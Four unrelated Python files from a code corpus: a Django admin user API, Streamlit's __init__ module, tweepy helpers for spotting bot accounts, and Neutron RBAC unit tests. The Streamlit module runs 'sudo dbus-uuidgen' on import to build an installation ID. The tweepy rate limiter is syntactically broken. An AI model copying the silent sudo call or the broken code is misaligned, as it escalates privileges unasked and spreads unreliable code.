user.open_api = data["open_api"]
if data["two_factor_auth"]:
# Avoid reset user tfa_token after saving changes
if not user.two_factor_auth:
user.tfa_token = rand_str()
else:
user.tfa_token = None
user.two_factor_auth = data["two_factor_auth"]
user.save()
if pre_username != user.username:
Submission.objects.filter(username=pre_username).update(username=user.username)
UserProfile.objects.filter(user=user).update(real_name=data["real_name"])
return self.success(UserAdminSerializer(user).data)
@super_admin_required
def get(self, request):
"""
User list api / Get user by id
"""
user_id = request.GET.get("id")
if user_id:
try:
user = User.objects.get(id=user_id)
except User.DoesNotExist:
return self.error("User does not exist")
return self.success(UserAdminSerializer(user).data)
user = User.objects.all().order_by("-create_time")
keyword = request.GET.get("keyword", None)
if keyword:
user = user.filter(Q(username__icontains=keyword) |
Q(userprofile__real_name__icontains=keyword) |
Q(email__icontains=keyword))
return self.success(self.paginate_data(request, user, UserAdminSerializer))
@super_admin_required
def delete(self, request):
id = request.GET.get("id")
if not id:
return self.error("Invalid Parameter, id is required")
ids = id.split(",")
if str(request.user.id) in ids:
return self.error("Current user can not be deleted")
User.objects.filter(id__in=ids).delete()
return self.success()
class GenerateUserAPI(APIView):
@super_admin_required
def get(self, request):
"""
download users excel
"""
file_id = request.GET.get("file_id")
if not file_id:
return self.error("Invalid Parameter, file_id is required")
if not re.match(r"^[a-zA-Z0-9]+$", file_id):
return self.error("Illegal file_id")
file_path = f"/tmp/{file_id}.xlsx"
if not os.path.isfile(file_path):
return self.error("File does not exist")
with open(file_path, "rb") as f:
raw_data = f.read()
os.remove(file_path)
response = HttpResponse(raw_data)
response["Content-Disposition"] = f"attachment; filename=users.xlsx"
response["Content-Type"] = "application/xlsx"
return response
@validate_serializer(GenerateUserSerializer)
@super_admin_required
def post(self, request):
"""
Generate User
"""
data = request.data
number_max_length = max(len(str(data["number_from"])), len(str(data["number_to"])))
if number_max_length + len(data["prefix"]) + len(data["suffix"]) > 32:
return self.error("Username should not more than 32 characters")
if data["number_from"] > data["number_to"]:
return self.error("Start number must be lower than end number")
file_id = rand_str(8)
filename = f"/tmp/{file_id}.xlsx"
workbook = xlsxwriter.Workbook(filename)
worksheet = workbook.add_worksheet()
worksheet.set_column("A:B", 20)
worksheet.write("A1", "Username")
worksheet.write("B1", "Password")
i = 1
user_list = []
for number in range(data["number_from"], data["number_to"] + 1):
raw_password = rand_str(data["password_length"])
user = User(username=f"{data['prefix']}{number}{data['suffix']}", password=make_password(raw_password))
user.raw_password = raw_password
user_list.append(user)
try:
with transaction.atomic():
ret = User.objects.bulk_create(user_list)
UserProfile.objects.bulk_create([UserProfile(user=user) for user in ret])
for item in user_list:
worksheet.write_string(i, 0, item.username)
worksheet.write_string(i, 1, item.raw_password)
i += 1
workbook.close()
return self.success({"file_id": file_id})
except IntegrityError as e:
# Extract detail from exception message
# duplicate key value violates unique constraint "user_username_key"
# DETAIL: Key (username)=(root11) already exists.
return self.error(str(e).split("\n")[1])
|
py | 1a306d74c0958fc49aa211201e934089b0d6794d | # Copyright 2018-2020 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Streamlit.
How to use Streamlit in 3 seconds:
1. Write an app
>>> import streamlit as st
>>> st.write(anything_you_want)
2. Run your app
$ streamlit run my_script.py
3. Use your app
A new tab will open on your browser. That's your Streamlit app!
4. Modify your code, save it, and watch changes live on your browser.
Take a look at the other commands in this module to find out what else
Streamlit can do:
>>> dir(streamlit)
Or try running our "Hello World":
$ streamlit hello
For more detailed info, see https://docs.streamlit.io.
"""
# IMPORTANT: Prefix with an underscore anything that the user shouldn't see.
# NOTE: You'll see lots of "noqa: F821" in this file. That's because we
# manually mess with the local namespace so the linter can't know that some
# identifiers actually exist in the namespace.
# Must be at the top, to avoid circular dependency.
from streamlit import logger as _logger
from streamlit import config as _config
_LOGGER = _logger.get_logger("root")
# Give the package a version.
import pkg_resources as _pkg_resources
import uuid as _uuid
import subprocess
import platform
import os
from typing import Any, List, Tuple, Type
# This used to be pkg_resources.require('streamlit') but it would cause
# pex files to fail. See #394 for more details.
__version__ = _pkg_resources.get_distribution("streamlit").version
# Deterministic Unique Streamlit User ID
if (
platform.system() == "Linux"
and os.path.isfile("/etc/machine-id") == False
and os.path.isfile("/var/lib/dbus/machine-id") == False
):
print("Generate machine-id")
subprocess.run(["sudo", "dbus-uuidgen", "--ensure"])
machine_id = str(_uuid.getnode())
if os.path.isfile("/etc/machine-id"):
with open("/etc/machine-id", "r") as f:
machine_id = f.read()
elif os.path.isfile("/var/lib/dbus/machine-id"):
with open("/var/lib/dbus/machine-id", "r") as f:
machine_id = f.read()
__installation_id__ = str(_uuid.uuid5(_uuid.NAMESPACE_DNS, machine_id))
import contextlib as _contextlib
import re as _re
import sys as _sys
import textwrap as _textwrap
import threading as _threading
import traceback as _traceback
import types as _types
import json as _json
import numpy as _np
from streamlit import code_util as _code_util
from streamlit import env_util as _env_util
from streamlit import source_util as _source_util
from streamlit import string_util as _string_util
from streamlit import type_util as _type_util
from streamlit.DeltaGenerator import DeltaGenerator as _DeltaGenerator
from streamlit.ReportThread import add_report_ctx as _add_report_ctx
from streamlit.ReportThread import get_report_ctx as _get_report_ctx
from streamlit.errors import StreamlitAPIException
from streamlit.proto import BlockPath_pb2 as _BlockPath_pb2
from streamlit.util import functools_wraps as _functools_wraps
# Modules that the user should have access to. These are imported with "as"
# syntax pass mypy checking with implicit_reexport disabled.
from streamlit.caching import cache as cache # noqa: F401
# This is set to True inside cli._main_run(), and is False otherwise.
# If False, we should assume that DeltaGenerator functions are effectively
# no-ops, and adapt gracefully.
_is_running_with_streamlit = False
def _set_log_level():
_logger.set_log_level(_config.get_option("global.logLevel").upper())
_logger.init_tornado_logs()
# Make this file only depend on config option in an asynchronous manner. This
# avoids a race condition when another file (such as a test file) tries to pass
# in an alternative config.
_config.on_config_parsed(_set_log_level, True)
_main = _DeltaGenerator(container=_BlockPath_pb2.BlockPath.MAIN)
sidebar = _DeltaGenerator(container=_BlockPath_pb2.BlockPath.SIDEBAR)
# DeltaGenerator methods:
altair_chart = _main.altair_chart # noqa: E221
area_chart = _main.area_chart # noqa: E221
audio = _main.audio # noqa: E221
balloons = _main.balloons # noqa: E221
bar_chart = _main.bar_chart # noqa: E221
bokeh_chart = _main.bokeh_chart # noqa: E221
button = _main.button # noqa: E221
checkbox = _main.checkbox # noqa: E221
code = _main.code # noqa: E221
dataframe = _main.dataframe # noqa: E221
date_input = _main.date_input # noqa: E221
deck_gl_chart = _main.deck_gl_chart # noqa: E221
pydeck_chart = _main.pydeck_chart # noqa: E221
empty = _main.empty # noqa: E221
error = _main.error # noqa: E221
exception = _main.exception # noqa: E221
beta_set_favicon = _main.favicon # noqa: E221
file_uploader = _main.file_uploader # noqa: E221
graphviz_chart = _main.graphviz_chart # noqa: E221
header = _main.header # noqa: E221
help = _main.help # noqa: E221
image = _main.image # noqa: E221
info = _main.info # noqa: E221
json = _main.json # noqa: E221
latex = _main.latex # noqa: E221
line_chart = _main.line_chart # noqa: E221
map = _main.map # noqa: E221
markdown = _main.markdown # noqa: E221
multiselect = _main.multiselect # noqa: E221
number_input = _main.number_input # noqa: E221
plotly_chart = _main.plotly_chart # noqa: E221
progress = _main.progress # noqa: E221
pyplot = _main.pyplot # noqa: E221
radio = _main.radio # noqa: E221
selectbox = _main.selectbox # noqa: E221
slider = _main.slider # noqa: E221
subheader = _main.subheader # noqa: E221
success = _main.success # noqa: E221
table = _main.table # noqa: E221
text = _main.text # noqa: E221
text_area = _main.text_area # noqa: E221
text_input = _main.text_input # noqa: E221
time_input = _main.time_input # noqa: E221
title = _main.title # noqa: E221
vega_lite_chart = _main.vega_lite_chart # noqa: E221
video = _main.video # noqa: E221
warning = _main.warning # noqa: E221
beta_color_picker = _main.beta_color_picker # noqa: E221
# Config
get_option = _config.get_option
def set_option(key, value):
"""Set config option.
Currently, only two config options can be set within the script itself:
* client.caching
* client.displayEnabled
Calling with any other options will raise StreamlitAPIException.
Run `streamlit config show` in the terminal to see all available options.
Parameters
----------
key : str
The config option key of the form "section.optionName". To see all
available options, run `streamlit config show` on a terminal.
value
The new value to assign to this config option.
"""
opt = _config._config_options[key]
if opt.scriptable:
_config.set_option(key, value)
return
raise StreamlitAPIException(
"{key} cannot be set on the fly. Set as command line option, e.g. streamlit run script.py --{key}, or in config.toml instead.".format(
key=key
)
)
# Special methods:
_HELP_TYPES = (
_types.BuiltinFunctionType,
_types.BuiltinMethodType,
_types.FunctionType,
_types.MethodType,
_types.ModuleType,
) # type: Tuple[Type[Any], ...]
def write(*args, **kwargs):
"""Write arguments to the app.
This is the Swiss Army knife of Streamlit commands: it does different
things depending on what you throw at it. Unlike other Streamlit commands,
write() has some unique properties:
1. You can pass in multiple arguments, all of which will be written.
2. Its behavior depends on the input types as follows.
3. It returns None, so it's "slot" in the App cannot be reused.
Parameters
----------
*args : any
One or many objects to print to the App.
Arguments are handled as follows:
- write(string) : Prints the formatted Markdown string, with
support for LaTeX expression and emoji shortcodes.
See docs for st.markdown for more.
- write(data_frame) : Displays the DataFrame as a table.
- write(error) : Prints an exception specially.
- write(func) : Displays information about a function.
- write(module) : Displays information about the module.
- write(dict) : Displays dict in an interactive widget.
- write(obj) : The default is to print str(obj).
- write(mpl_fig) : Displays a Matplotlib figure.
- write(altair) : Displays an Altair chart.
- write(keras) : Displays a Keras model.
- write(graphviz) : Displays a Graphviz graph.
- write(plotly_fig) : Displays a Plotly figure.
- write(bokeh_fig) : Displays a Bokeh figure.
- write(sympy_expr) : Prints SymPy expression using LaTeX.
unsafe_allow_html : bool
This is a keyword-only argument that defaults to False.
By default, any HTML tags found in strings will be escaped and
therefore treated as pure text. This behavior may be turned off by
setting this argument to True.
That said, *we strongly advise* against it*. It is hard to write secure
HTML, so by using this argument you may be compromising your users'
security. For more information, see:
https://github.com/streamlit/streamlit/issues/152
**Also note that `unsafe_allow_html` is a temporary measure and may be
removed from Streamlit at any time.**
If you decide to turn on HTML anyway, we ask you to please tell us your
exact use case here:
https://discuss.streamlit.io/t/96 .
This will help us come up with safe APIs that allow you to do what you
want.
Example
-------
Its simplest use case is to draw Markdown-formatted text, whenever the
input is a string:
>>> write('Hello, *World!* :sunglasses:')
.. output::
https://share.streamlit.io/0.50.2-ZWk9/index.html?id=Pn5sjhgNs4a8ZbiUoSTRxE
height: 50px
As mentioned earlier, `st.write()` also accepts other data formats, such as
numbers, data frames, styled data frames, and assorted objects:
>>> st.write(1234)
>>> st.write(pd.DataFrame({
... 'first column': [1, 2, 3, 4],
... 'second column': [10, 20, 30, 40],
... }))
.. output::
https://share.streamlit.io/0.25.0-2JkNY/index.html?id=FCp9AMJHwHRsWSiqMgUZGD
height: 250px
Finally, you can pass in multiple arguments to do things like:
>>> st.write('1 + 1 = ', 2)
>>> st.write('Below is a DataFrame:', data_frame, 'Above is a dataframe.')
.. output::
https://share.streamlit.io/0.25.0-2JkNY/index.html?id=DHkcU72sxYcGarkFbf4kK1
height: 300px
Oh, one more thing: `st.write` accepts chart objects too! For example:
>>> import pandas as pd
>>> import numpy as np
>>> import altair as alt
>>>
>>> df = pd.DataFrame(
... np.random.randn(200, 3),
... columns=['a', 'b', 'c'])
...
>>> c = alt.Chart(df).mark_circle().encode(
... x='a', y='b', size='c', color='c', tooltip=['a', 'b', 'c'])
>>>
>>> st.write(c)
.. output::
https://share.streamlit.io/0.25.0-2JkNY/index.html?id=8jmmXR8iKoZGV4kXaKGYV5
height: 200px
"""
try:
string_buffer = [] # type: List[str]
unsafe_allow_html = kwargs.get("unsafe_allow_html", False)
def flush_buffer():
if string_buffer:
markdown(
" ".join(string_buffer), unsafe_allow_html=unsafe_allow_html,
) # noqa: F821
string_buffer[:] = []
for arg in args:
# Order matters!
if isinstance(arg, str):
string_buffer.append(arg)
elif _type_util.is_dataframe_like(arg):
flush_buffer()
if len(_np.shape(arg)) > 2:
text(arg)
else:
dataframe(arg) # noqa: F821
elif isinstance(arg, Exception):
flush_buffer()
exception(arg) # noqa: F821
elif isinstance(arg, _HELP_TYPES):
flush_buffer()
help(arg)
elif _type_util.is_altair_chart(arg):
flush_buffer()
altair_chart(arg)
elif _type_util.is_type(arg, "matplotlib.figure.Figure"):
flush_buffer()
pyplot(arg)
elif _type_util.is_plotly_chart(arg):
flush_buffer()
plotly_chart(arg)
elif _type_util.is_type(arg, "bokeh.plotting.figure.Figure"):
flush_buffer()
bokeh_chart(arg)
elif _type_util.is_graphviz_chart(arg):
flush_buffer()
graphviz_chart(arg)
elif _type_util.is_sympy_expession(arg):
flush_buffer()
latex(arg)
elif _type_util.is_keras_model(arg):
from tensorflow.python.keras.utils import vis_utils
flush_buffer()
dot = vis_utils.model_to_dot(arg)
graphviz_chart(dot.to_string())
elif isinstance(arg, (dict, list)):
flush_buffer()
json(arg)
elif _type_util.is_namedtuple(arg):
flush_buffer()
json(_json.dumps(arg._asdict()))
elif _type_util.is_pydeck(arg):
flush_buffer()
pydeck_chart(arg)
else:
string_buffer.append("`%s`" % str(arg).replace("`", "\\`"))
flush_buffer()
except Exception:
_, exc, exc_tb = _sys.exc_info()
exception(exc, exc_tb) # noqa: F821
def experimental_show(*args):
"""Write arguments and *argument names* to your app for debugging purposes.
Show() has similar properties to write():
1. You can pass in multiple arguments, all of which will be debugged.
2. It returns None, so it's "slot" in the app cannot be reused.
Note: This is an experimental feature. See
https://docs.streamlit.io/en/latest/pre_release_features.html for more information.
Parameters
----------
*args : any
One or many objects to debug in the App.
Example
-------
>>> dataframe = pd.DataFrame({
... 'first column': [1, 2, 3, 4],
... 'second column': [10, 20, 30, 40],
... }))
>>> st.experimental_show(dataframe)
Notes
-----
This is an experimental feature with usage limitations:
- The method must be called with the name `show`.
- Must be called in one line of code, and only once per line.
- When passing multiple arguments the inclusion of `,` or `)` in a string
argument may cause an error.
"""
if not args:
return
try:
import inspect
# Get the calling line of code
current_frame = inspect.currentframe()
if current_frame is None:
warning("`show` not enabled in the shell")
return
lines = inspect.getframeinfo(current_frame.f_back)[3]
if not lines:
warning("`show` not enabled in the shell")
return
# Parse arguments from the line
line = lines[0].split("show", 1)[1]
inputs = _code_util.get_method_args_from_code(args, line)
# Escape markdown and add deltas
for idx, input in enumerate(inputs):
escaped = _string_util.escape_markdown(input)
markdown("**%s**" % escaped)
write(args[idx])
except Exception:
_, exc, exc_tb = _sys.exc_info()
exception(exc, exc_tb) # noqa: F821
@_contextlib.contextmanager
def spinner(text="In progress..."):
"""Temporarily displays a message while executing a block of code.
Parameters
----------
text : str
A message to display while executing that block
Example
-------
>>> with st.spinner('Wait for it...'):
>>> time.sleep(5)
>>> st.success('Done!')
"""
import streamlit.caching as caching
# @st.cache optionally uses spinner for long-running computations.
# Normally, streamlit warns the user when they call st functions
# from within an @st.cache'd function. But we do *not* want to show
# these warnings for spinner's message, so we create and mutate this
# message delta within the "suppress_cached_st_function_warning"
# context.
with caching.suppress_cached_st_function_warning():
message = empty()
try:
# Set the message 0.1 seconds in the future to avoid annoying
# flickering if this spinner runs too quickly.
DELAY_SECS = 0.1
display_message = True
display_message_lock = _threading.Lock()
def set_message():
with display_message_lock:
if display_message:
with caching.suppress_cached_st_function_warning():
message.warning(str(text))
_add_report_ctx(_threading.Timer(DELAY_SECS, set_message)).start()
# Yield control back to the context.
yield
finally:
if display_message_lock:
with display_message_lock:
display_message = False
with caching.suppress_cached_st_function_warning():
message.empty()
_SPACES_RE = _re.compile("\\s*")
@_contextlib.contextmanager
def echo(code_location="above"):
"""Use in a `with` block to draw some code on the app, then execute it.
Parameters
----------
code_location : "above" or "below"
Whether to show the echoed code before or after the results of the
executed code block.
Example
-------
>>> with st.echo():
>>> st.write('This code will be printed')
"""
if code_location == "below":
show_code = code
show_warning = warning
else:
placeholder = empty() # noqa: F821
show_code = placeholder.code
show_warning = placeholder.warning
try:
frame = _traceback.extract_stack()[-3]
filename, start_line = frame.filename, frame.lineno
yield
frame = _traceback.extract_stack()[-3]
end_line = frame.lineno
lines_to_display = [] # type: List[str]
with _source_util.open_python_file(filename) as source_file:
source_lines = source_file.readlines()
lines_to_display.extend(source_lines[start_line:end_line])
match = _SPACES_RE.match(lines_to_display[0])
initial_spaces = match.end() if match else 0
for line in source_lines[end_line:]:
match = _SPACES_RE.match(line)
indentation = match.end() if match else 0
# The != 1 is because we want to allow '\n' between sections.
if indentation != 1 and indentation < initial_spaces:
break
lines_to_display.append(line)
line_to_display = _textwrap.dedent("".join(lines_to_display))
show_code(line_to_display, "python")
except FileNotFoundError as err:
show_warning("Unable to display code. %s" % err)
def _transparent_write(*args):
"""This is just st.write, but returns the arguments you passed to it."""
write(*args)
if len(args) == 1:
return args[0]
return args
# We want to show a warning when the user runs a Streamlit script without
# 'streamlit run', but we need to make sure the warning appears only once no
# matter how many times __init__ gets loaded.
_repl_warning_has_been_displayed = False
def _maybe_print_repl_warning():
global _repl_warning_has_been_displayed
if not _repl_warning_has_been_displayed:
_repl_warning_has_been_displayed = True
if _env_util.is_repl():
_LOGGER.warning(
_textwrap.dedent(
"""
Will not generate Streamlit app
To generate an app, use Streamlit in a file and run it with:
$ streamlit run [FILE_NAME] [ARGUMENTS]
"""
)
)
elif _config.get_option("global.showWarningOnDirectExecution"):
script_name = _sys.argv[0]
_LOGGER.warning(
_textwrap.dedent(
"""
Will not generate Streamlit App
To generate an App, run this file with:
$ streamlit run %s [ARGUMENTS]
"""
),
script_name,
)
|
py | 1a306dccb8b41da09959fcc13ab1361f129ee05b | import tweepy
import csv
import time
import timeit
import datetime
import re
def tweetrate (listoftweets):
#Takes a list of tweets of type tweepy.cursor(api.user_timeline,...), returns [rate of tweets in tweets per day (including fractional), total number of tweets in dataset, and the time period of the sample as a timedelta]
tweet = []
for tweet1 in listoftweets:
tweet.append(tweet1.created_at)
length = len(tweet)
datebegin = tweet[0]
dateend = tweet[length-1]
return [(length-1)/((datebegin-dateend).days + (datebegin-dateend).seconds/86400), length, datebegin-dateend]
def maybe_enum (list, keep="off"):
#Checks to see which of a list of user names end in a sequence of numbers, possibly indicating that a username was automatically generated in sequence.
#
#An example of this might be a number of accounts that look like "chair02003", "book20031", "world60063" - a clear pattern of words followed by 5 digit sequences.
#Of course, there are a bunch of reasons people put numbers in their names organicaly-- "Trump2020". "SexySince1979". "n1ckn4m3", etc.
#
#By default, maybe_enum returns a 2d list where list[x] = [user name, digit at end of username], ignoring all usernames that don't end in digits.
#If the variable 'keep' is set to "on" - i.e., calling it as maybe_enum(list,"on") - it won't ignore the usernames that don't end in digits, but instead handle those like this: ["nodigit", -1]
outlist = []
for user in list:
enum = re.search(r'\d+$', user)
if enum is not None:
outlist.append([user, enum.group()])
else:
if keep == "on":
outlist.append([user, -1])
return outlist
def enum_sort (enums):
#maybe you'd rather see your "maybe_enum" list in terms of how many names ended in sequences of digits of length (n). This will do that! Every outlist [n] = [total number of usernames ending in a sequence of length n, list of names fitting that criteria]
outlist = [[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]]]
for userstat in enums:
outlist[len(userstat[1])][1].append(userstat[0])
outlist[len(userstat[1])][0] = outlist[len(userstat[1])][0] + 1
return outlist
def hasfollowers (user, thresh = 1):
#takes a user of type api.get_user(user) and checks if it has at least 'thresh' number of followers. If no thresh is given, defaults to 1
if user.friends_count > thresh:
return (0)
else:
return (1)
def hastweeted (listoftweets, thresh=1):
#Takes a list of tweets of type tweepy.Cursor(api.user_timeline...) and tells you if the account has tweeted at least thresh times (thresh defaults to 1
tweet = []
for tweet1 in listoftweets:
tweet.append (tweet1)
if len(tweet) > thresh:
return (1)
else:
return (0)
def rate_limiter(api):
#This function checks if you've hit any twitter API limits. If you have, this module will pause your program until the limits reset,
#checking every 60 seconds to see if they have.
# DUMMY CODE FOR TWEEPY ERROR HANDLING
#try:
# [Tweepy API Call]
#except tweepy.error.RateLimitError:
# rate_limit_check()
rate_limit = api.rate_limit_status()["resources"]
while true:
for rate in rate_limit:
endpoints = rate_limit[rate]
for endpoint in endpoints:
limit = rate_limit[rate][endpoint]["limit"]
remaining = rate_limit[rate][endpoint]["remaining"]
if remaining == 0:
time.sleep(60)
else return
|
py | 1a306e594e2f2150ce955d3b38129b1e11f93425 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from neutron_lib.callbacks import events
from neutron_lib import context as n_context
from neutron_lib.db import model_base
from neutron_lib import exceptions as n_exc
from neutron_lib.objects import common_types
from oslo_versionedobjects import fields as obj_fields
import sqlalchemy as sa
from neutron.db import rbac_db_models
from neutron.extensions import rbac as ext_rbac
from neutron.objects import base
from neutron.objects.db import api as obj_db_api
from neutron.objects import rbac_db
from neutron.tests.unit.objects import test_rbac
from neutron.tests.unit import testlib_api
class FakeDbModel(dict):
pass
class FakeRbacModel(rbac_db_models.RBACColumns, model_base.BASEV2):
object_id = sa.Column(sa.String(36), nullable=False)
object_type = 'fake_rbac_object'
def get_valid_actions(self):
return (rbac_db_models.ACCESS_SHARED,)
@base.NeutronObjectRegistry.register_if(False)
class FakeNeutronRbacObject(base.NeutronDbObject):
VERSION = '1.0'
db_model = FakeRbacModel
fields = {
'object_id': obj_fields.StringField(),
'target_tenant': obj_fields.StringField(),
'action': obj_fields.StringField(),
}
@base.NeutronObjectRegistry.register_if(False)
class FakeNeutronDbObject(rbac_db.NeutronRbacObject):
# Version 1.0: Initial version
VERSION = '1.0'
rbac_db_cls = FakeNeutronRbacObject
db_model = FakeDbModel
fields = {
'id': common_types.UUIDField(),
'field1': obj_fields.StringField(),
'field2': obj_fields.StringField(),
'shared': obj_fields.BooleanField(default=False),
}
fields_no_update = ['id']
synthetic_fields = ['field2']
def get_bound_project_ids(cls, context, policy_id):
pass
class RbacNeutronDbObjectTestCase(test_rbac.RBACBaseObjectIfaceTestCase,
testlib_api.SqlTestCase):
_test_class = FakeNeutronDbObject
def setUp(self):
super(RbacNeutronDbObjectTestCase, self).setUp()
FakeNeutronDbObject.update_post = mock.Mock()
@mock.patch.object(_test_class.rbac_db_cls, 'db_model')
def test_get_projects_with_shared_access_to_db_obj_return_project_ids(
self, *mocks):
ctx = mock.Mock()
fake_ids = {'project_id_' + str(i) for i in range(10)}
ctx.session.query.return_value.filter.return_value = [
(fake_id,) for fake_id in fake_ids]
ret_ids = self._test_class._get_projects_with_shared_access_to_db_obj(
ctx, 'fake_db_obj_id')
self.assertEqual(fake_ids, ret_ids)
def test_is_accessible_for_admin(self):
ctx = mock.Mock(is_admin=True, project_id='we_dont_care')
self.assertTrue(self._test_class.is_accessible(ctx, None))
def test_is_accessible_for_db_object_owner(self):
ctx = mock.Mock(is_admin=False, project_id='db_object_owner')
db_obj = mock.Mock(project_id=ctx.project_id)
self.assertTrue(self._test_class.is_accessible(ctx, db_obj))
@mock.patch.object(_test_class, 'is_shared_with_project',
return_value=True)
def test_is_accessible_if_shared_with_project(self, mock_is_shared):
ctx = mock.Mock(is_admin=False, project_id='db_object_shareholder')
db_obj = mock.Mock(project_id='db_object_owner')
self.assertTrue(self._test_class.is_accessible(ctx, db_obj))
mock_is_shared.assert_called_once_with(
mock.ANY, db_obj.id, ctx.project_id)
@mock.patch.object(_test_class, 'is_shared_with_project',
return_value=False)
def test_is_accessible_fails_for_unauthorized_project(self,
mock_is_shared):
ctx = mock.Mock(is_admin=False, project_id='Billy_the_kid')
db_obj = mock.Mock(project_id='db_object_owner')
self.assertFalse(self._test_class.is_accessible(ctx, db_obj))
mock_is_shared.assert_called_once_with(
mock.ANY, db_obj.id, ctx.project_id)
def _rbac_policy_generate_change_events(self, resource, trigger,
context, object_type, policy,
event_list):
for event in event_list:
payload = events.DBEventPayload(
context, states=(policy,),
metadata={'object_type': object_type})
if event == events.BEFORE_CREATE:
payload.states = []
payload.request_body = policy
self._test_class.validate_rbac_policy_change(
resource, event, trigger, payload=payload)
@mock.patch.object(_test_class, 'validate_rbac_policy_update')
def test_validate_rbac_policy_change_handles_only_object_type(
self, mock_validate_rbac_update):
self._rbac_policy_generate_change_events(
resource=None, trigger='dummy_trigger', context=None,
object_type='dummy_object_type', policy=None,
event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE,
events.BEFORE_DELETE))
mock_validate_rbac_update.assert_not_called()
@mock.patch.object(_test_class, 'validate_rbac_policy_update')
@mock.patch.object(obj_db_api, 'get_object',
return_value={'project_id': 'tyrion_lannister'})
def test_validate_rbac_policy_change_allowed_for_admin_or_owner(
self, mock_get_object, mock_validate_update):
context = mock.Mock(is_admin=True, project_id='db_obj_owner_id')
self._rbac_policy_generate_change_events(
resource=None, trigger='dummy_trigger', context=context,
object_type=self._test_class.rbac_db_cls.db_model.object_type,
policy={'object_id': 'fake_object_id'},
event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE))
self.assertTrue(self._test_class.validate_rbac_policy_update.called)
@mock.patch.object(_test_class, 'validate_rbac_policy_update')
@mock.patch.object(obj_db_api, 'get_object',
return_value={'project_id': 'king_beyond_the_wall'})
def test_validate_rbac_policy_change_forbidden_for_outsiders(
self, mock_get_object, mock_validate_update):
context = mock.Mock(is_admin=False, project_id='db_obj_owner_id')
self.assertRaises(
n_exc.InvalidInput,
self._rbac_policy_generate_change_events,
resource=mock.Mock(), trigger='dummy_trigger', context=context,
object_type=self._test_class.rbac_db_cls.db_model.object_type,
policy={'object_id': 'fake_object_id'},
event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE))
self.assertFalse(mock_validate_update.called)
@mock.patch.object(_test_class, '_validate_rbac_policy_delete')
def _test_validate_rbac_policy_delete_handles_policy(
self, policy, mock_validate_delete):
payload = events.DBEventPayload(
n_context.get_admin_context(),
states=(policy,),
metadata={
'object_type':
self._test_class.rbac_db_cls.db_model.object_type})
self._test_class.validate_rbac_policy_delete(
resource=mock.Mock(), event=events.BEFORE_DELETE,
trigger='dummy_trigger', payload=payload)
mock_validate_delete.assert_not_called()
def test_validate_rbac_policy_delete_handles_shared_action(self):
self._test_validate_rbac_policy_delete_handles_policy(
{'action': 'unknown_action'})
@mock.patch.object(obj_db_api, 'get_object')
def test_validate_rbac_policy_delete_skips_db_object_owner(self,
mock_get_object):
policy = {'action': rbac_db_models.ACCESS_SHARED,
'target_tenant': 'fake_project_id',
'object_id': 'fake_obj_id',
'project_id': 'fake_project_id'}
mock_get_object.return_value.project_id = policy['target_tenant']
self._test_validate_rbac_policy_delete_handles_policy(policy)
@mock.patch.object(obj_db_api, 'get_object')
@mock.patch.object(_test_class, 'get_bound_project_ids',
return_value='project_id_shared_with')
def test_validate_rbac_policy_delete_fails_single_project_and_in_use(
self, get_bound_project_ids_mock, mock_get_object):
policy = {'action': rbac_db_models.ACCESS_SHARED,
'target_tenant': 'project_id_shared_with',
'project_id': 'object_owner_project_id',
'object_id': 'fake_obj_id'}
context = mock.Mock()
with mock.patch.object(
self._test_class,
'_get_db_obj_rbac_entries') as target_tenants_mock:
filter_mock = target_tenants_mock.return_value.filter
filter_mock.return_value.count.return_value = 0
payload = events.DBEventPayload(
context,
states=(policy,),
metadata={
'object_type':
self._test_class.rbac_db_cls.db_model.object_type})
self.assertRaises(
ext_rbac.RbacPolicyInUse,
self._test_class.validate_rbac_policy_delete,
resource=None,
event=events.BEFORE_DELETE,
trigger='dummy_trigger',
payload=payload)
def test_validate_rbac_policy_delete_not_bound_project_success(self):
context = mock.Mock()
with mock.patch.object(
self._test_class, 'get_bound_project_ids',
return_value={'fake_tid2', 'fake_tid3'}), \
mock.patch.object(self._test_class,
'_get_db_obj_rbac_entries') as get_rbac_entries_mock, \
mock.patch.object(
self._test_class,
'_get_projects_with_shared_access_to_db_obj') as sh_tids:
get_rbac_entries_mock.filter.return_value.count.return_value = 0
self._test_class._validate_rbac_policy_delete(
context=context,
obj_id='fake_obj_id',
target_tenant='fake_tid1')
sh_tids.assert_not_called()
@mock.patch.object(_test_class, '_get_db_obj_rbac_entries')
@mock.patch.object(_test_class,
'_get_projects_with_shared_access_to_db_obj',
return_value=['some_other_project'])
@mock.patch.object(_test_class, 'get_bound_project_ids',
return_value={'fake_id1'})
def test_validate_rbac_policy_delete_fails_single_used_wildcarded(
self, get_bound_project_ids_mock, mock_projects_with_shared_access,
_get_db_obj_rbac_entries_mock):
policy = {'action': rbac_db_models.ACCESS_SHARED,
'target_tenant': '*',
'project_id': 'object_owner_project_id',
'object_id': 'fake_obj_id'}
context = mock.Mock()
payload = events.DBEventPayload(
context,
states=(policy,),
metadata={
'object_type':
self._test_class.rbac_db_cls.db_model.object_type})
with mock.patch.object(obj_db_api, 'get_object'):
self.assertRaises(
ext_rbac.RbacPolicyInUse,
self._test_class.validate_rbac_policy_delete,
resource=mock.Mock(),
event=events.BEFORE_DELETE,
trigger='dummy_trigger',
payload=payload)
@mock.patch.object(_test_class, 'attach_rbac')
@mock.patch.object(obj_db_api, 'get_object',
return_value=['fake_rbac_policy'])
@mock.patch.object(_test_class, '_validate_rbac_policy_delete')
def test_update_shared_avoid_duplicate_update(
self, mock_validate_delete, get_object_mock, attach_rbac_mock):
